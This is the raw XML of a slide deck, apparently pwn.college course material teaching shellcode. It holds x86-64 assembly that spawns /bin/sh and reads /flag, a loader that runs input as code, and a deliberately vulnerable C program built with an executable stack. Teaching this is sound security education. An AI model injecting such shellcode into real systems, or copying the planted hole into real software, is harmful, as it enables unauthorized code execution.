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  <p:embeddedFont>
      <p:font typeface="Roboto Light"/>
      <p:regular r:id="rId30"/>
      <p:bold r:id="rId31"/>
      <p:italic r:id="rId32"/>
      <p:boldItalic r:id="rId33"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Electrolize"/>
      <p:regular r:id="rId34"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Oswald"/>
      <p:regular r:id="rId35"/>
      <p:bold r:id="rId36"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Mono Regular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Regular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Tahoma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Tahom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Light-bold.fntdata"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoLight-regular.fntdata"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide5.xml"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Roboto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Light-italic.fntdata"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide7.xml"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Oswald-regular.fntdata"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide6.xml"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Electrolize-regular.fntdata"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide9.xml"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoMonoRegular-regular.fntdata"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide8.xml"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Oswald-bold.fntdata"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide11.xml"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoMonoRegular-italic.fntdata"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide10.xml"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoMonoRegular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605bf38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605bf38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355bd7e67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355bd7e67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355bd7e67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355bd7e67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605bf3899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605bf3899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268fba137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268fba137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605bf3899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605bf3899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605bf3899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9605bf3899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605bf3899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605bf3899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355bd7e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355bd7e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355bd7e67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355bd7e6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b34f8e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b34f8e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605bf3899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605bf3899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605bf3899_1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605bf3899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0953d030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0953d030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355bd7e67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355bd7e67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05bf38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605bf38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ourceware.org/gdb/onlinedocs/gdb/Reverse-Execution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pwn.colleg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Non-shell shellcode</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="287" name="Google Shape;287;p5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Shellcode can have many different goals, other than just dropping a shell.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Specialized for our class</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>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sendfile(1, open("/flag", NULL), 0, 1000)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rbx, 0x00000067616c662f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push "/flag" filename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push rbx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2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syscall number of open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rdi, rsp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 the first argument at stack (where we have "/flag")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rsi, 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NULL out the second argument (meaning, O_RDONLY)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trigger open("/flag", NULL)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rdi, 1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first argument to sendfile is the file descriptor to output to (stdout)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rsi, rax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second argument is the file descriptor returned by open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third argument is the number of bytes to skip from the input file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r10, 1000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fourth argument is the number of bytes to transfer to the output file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40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syscall number of sendfile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trigger sendfile(1, fd, 0, 1000)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60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syscall number of exit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trigger exit()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Shellcode</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="293" name="Google Shape;293;p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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1500"/>
              <a:t>rite your shellcode as assembly:</a:t>
            </a:r>
            <a:endParaRPr sz="15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.global _start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_start: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.intel_syntax noprefix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mov rax, 59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is the syscall number of execve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lea rdi, [rip+binsh]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points the first argument of execve at the /bin/sh string below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mov rsi, 0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second argument, argv, NULL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mov rdx, 0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third argument, envp, NULL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syscall	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triggers the system call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binsh:				</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="6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a label marking where the /bin/sh string is</a:t>
            </a:r>
            <a:endParaRPr sz="6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.string "/bin/sh"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Then, assemble it!</a:t>
            </a:r>
            <a:endParaRPr sz="15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gcc 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-nostdlib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-static shellcode.s -o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shellcode-elf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is an ELF with your shellcode as its </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:latin typeface="Roboto Mono Regular"/>
                <a:ea typeface="Roboto Mono Regular"/>
                <a:cs typeface="Roboto Mono Regular"/>
                <a:sym typeface="Roboto Mono Regular"/>
              </a:rPr>
              <a:t>.text</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t>. You still need to extract it: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objcopy --dump-section .text=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1100">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>shellcode-raw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shellcode-elf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The resulting shellcode-raw file contains the raw bytes of your shellcode.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1600"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t>This is what you would inject as part of your exploits.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Shellcode</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="299" name="Google Shape;299;p5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ELF from before is very useful for testing your shellcode!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gcc -nostdlib -static shellcode.s -o shellcode-elf</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="13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	./shellcode-elf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Magic!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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> Shellcode (replicating exotic conditions)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="305" name="Google Shape;305;p5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need to replicate exotic conditions in ways that are too hard to do as a preamble for your shellcode, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>you can build a shellcode loader in C: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page = mmap(0x1337000, 0x1000, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANON, 0, 0);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read(0, page, 0x1000);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((void(*)())page)();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cat shellcode-raw | ./tester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Shellcode: strace</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="311" name="Google Shape;311;p5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see if things are working from a high level, you can trace your shellcode with strace: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gcc -nostdlib -static shellcode.s -o shellcode-elf</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="13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	strace ./shellcode-elf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can show you, at a high level, what your shellcode is doing (or not doing!).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Shellcode: gdb</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="317" name="Google Shape;317;p5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shellcode-elf is a Linux program, and you can debug it in gdb.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gdb ./shellcode-elf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Caveats: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there is no source code to display and navigate.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print the next 5 instructions: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x/5i $rip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you can examine qwords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x/gx $rsp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>), dwords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x/2dx $rsp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>), halfwords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x/4hx $rsp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>), and bytes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x/8b $rsp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>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step one instruction (follow call instructions):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si</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>, NOT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step one instruction (step over call instructions):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ni</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>, NOT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break at an address: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break *0x400000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200"/>
              <a:t>,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continue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>, and reverse execution (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https://sourceware.org/gdb/onlinedocs/gdb/Reverse-Execution.html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>) work as expected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hardcode breakpoints in your shellcode!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breakpoints are implemented with the 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int3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t> instruction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you can place this anywhere yourself!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especially useful at the start of shellcode to catch the beginning of shellcode execution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Shellcode for other architectures</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="323" name="Google Shape;323;p5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way of building shellcode translates well to other architectures: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amd64: gcc -nostdlib -static shellcode.s -o shellcode-elf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mips: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1300">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>mips-linux-gnu-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gcc -nostdlib shellcode-mips.s -o shellcode-mips-elf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Similarly, we can run cross-architecture shellcode with an emulator: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amd64: ./shellcode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mips: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1300">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>qemu-mips-static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./shellcode-mips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Useful qemu options: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-strace</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>		print out a log of the system calls (like strace)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-g 1234</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>		wait for a gdb connection on port 1234. Connect with</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1400"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>				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target remote localhost:1234</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t> in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gdb-multiarch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Practice!</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="329" name="Google Shape;329;p6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Head over to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pwn.college</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>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a level.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 the constraints or changes done on your shellcode.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shellcode to bypass them and read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/flag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idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="503250" y="32549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John Mauchly (Physicist), John Presper Eckert (Electrical Engineer), John Von Neumann (Mathematician)</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp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15554" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="715675" y="459123"/>
            <a:ext cx="5173800" cy="2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5"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="10504" l="0" r="0" t="5049"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5882775" y="459125"/>
            <a:ext cx="2538850" cy="27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5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="503250" y="40776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John von Neumann, First Draft of a Report on the EDVAC, 1945.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Von Neumann Architecture vs Harvard Architecture</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="232" name="Google Shape;232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Von Neumann architecture sees (and stores) code as data.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Harvard architecture stores data and code separately.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Almost all general-purpose architectures (x86, ARM, MIPS, PPC, SPARC, etc) are Von Neumann.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Harvard architectures pop up in embedded use-cases (AVR, PIC).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happens if data and code get mixed up?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shellcode get injected?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="238" name="Google Shape;238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bye1() { puts("Goodbye!");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bye2() { puts("Farewell!");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hello(char *name, void (*bye_func)())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printf("Hello %s!\n",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bye_func();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char name[1024];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gets(name);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srand(time(0));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if (rand() % 2) hello(bye1,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else hello(name, bye2);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Compile with: gcc -z execstack -o hello hello.c</a:t>
            </a:r>
            <a:endParaRPr sz="11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bye1() { puts("Goodbye!");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bye2() { puts("Farewell!");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hello(char *name, void (*bye_func)())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printf("Hello %s!\n",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bye_func();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char name[1024];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gets(name);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srand(time(0));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if (rand() % 2) hello(bye1,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else hello(name, bye2);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Compile with: gcc -z execstack -o hello hello.c</a:t>
            </a:r>
            <a:endParaRPr sz="11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4" name="Google Shape;244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shellcode get injected?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="245" name="Google Shape;245;p48"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="3234600" y="2065500"/>
            <a:ext cx="64800" cy="166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48"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="2014200" y="2062800"/>
            <a:ext cx="769500" cy="1663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shellcode get injected?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="252" name="Google Shape;252;p49"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5874000" y="1933199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.text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3" name="Google Shape;253;p49"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5874000" y="3048250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stack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4" name="Google Shape;254;p49"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5874000" y="3605386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heap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5" name="Google Shape;255;p49"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5874000" y="2490335"/>
            <a:ext cx="1782000" cy="55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.bss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56" name="Google Shape;256;p49"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5874000" y="1375274"/>
            <a:ext cx="1782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lectrolize"/>
                <a:ea typeface="Electrolize"/>
                <a:cs typeface="Electrolize"/>
                <a:sym typeface="Electrolize"/>
              </a:rPr>
              <a:t>PROCESS MEMORY</a:t>
            </a:r>
            <a:endParaRPr sz="12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257" name="Google Shape;257;p49"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="252" idx="1"/>
            <a:endCxn id="253" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5874000" y="2211899"/>
            <a:ext cx="600" cy="11151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49"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="3234600" y="2065500"/>
            <a:ext cx="64800" cy="166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49"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="2014200" y="2062800"/>
            <a:ext cx="769500" cy="1663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0" name="Google Shape;260;p49"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-5400000">
            <a:off x="4818825" y="2678700"/>
            <a:ext cx="15552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bye_func();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" name="Google Shape;261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bye1() { puts("Goodbye!");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bye2() { puts("Farewell!"); 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void hello(char *name, void (*bye_func)())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printf("Hello %s!\n",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bye_func();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char name[1024];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gets(name);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srand(time(0));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if (rand() % 2) hello(bye1, name);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else hello(name, bye2);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latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
            </a:b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Compile with: gcc -z execstack -o hello hello.c</a:t>
            </a:r>
            <a:endParaRPr sz="11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Concept: Code Injection</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="267" name="Google Shape;267;p50"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1200150"/>
            <a:ext cx="5185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Code injection was used in one of the earliest documented exploits: the Morris worm.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Among other attack vectors, overflowed stack buffer in the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fingerd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 service.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Injected shellcode to gain a foothold on the machine.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Scanned adjacent hosts and infected them to propagate the worm.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-"/>
            </a:pPr>
            <a:r>
              <a:rPr i="1" lang="en" sz="1800">
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Shut down the internet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="18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/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="268" name="Google Shape;2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110" y="0"/>
            <a:ext cx="34198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0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="4962000"/>
            <a:ext cx="55863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Try it yourself! https://blog.rapid7.com/2019/01/02/the-ghost-of-exploits-past-a-deep-dive-into-the-morris-worm/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"shell"code?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="275" name="Google Shape;275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Usually, the goal of an exploit is to achieve arbitrary command execution.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 typical attack goal is to launch a shell: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execve("/bin/sh", NULL, NULL)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>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59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is the syscall number of execve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lea rdi, [rip+binsh]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points the first argument of execve at the /bin/sh string below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rsi, 0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second argument, argv, NULL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0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makes the third argument, envp, NULL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this triggers the system call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binsh:				</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1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a label marking where the /bin/sh string is</a:t>
            </a:r>
            <a:endParaRPr sz="10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.string "/bin/sh"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Thus: "shellcode".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Tangent: DATA in your CODE</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="281" name="Google Shape;281;p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.string "/bin/sh"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/>
              <a:t>???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intersperse arbitrary data in your shellcode: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.byte 0x48, 0x45, 0x4C, 0x4C, 0x4F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"HELLO"</a:t>
            </a:r>
            <a:b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.string "HELLO"				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"HELLO\0"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Other ways to embed data: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rbx, 0x0068732f6e69622f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move "/bin/sh\0" into rbx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push rbx				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push "/bin/sh\0" onto the stack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rdi, rsp				</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="14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# point rdi at the stack</a:t>
            </a:r>
            <a:endParaRPr sz="140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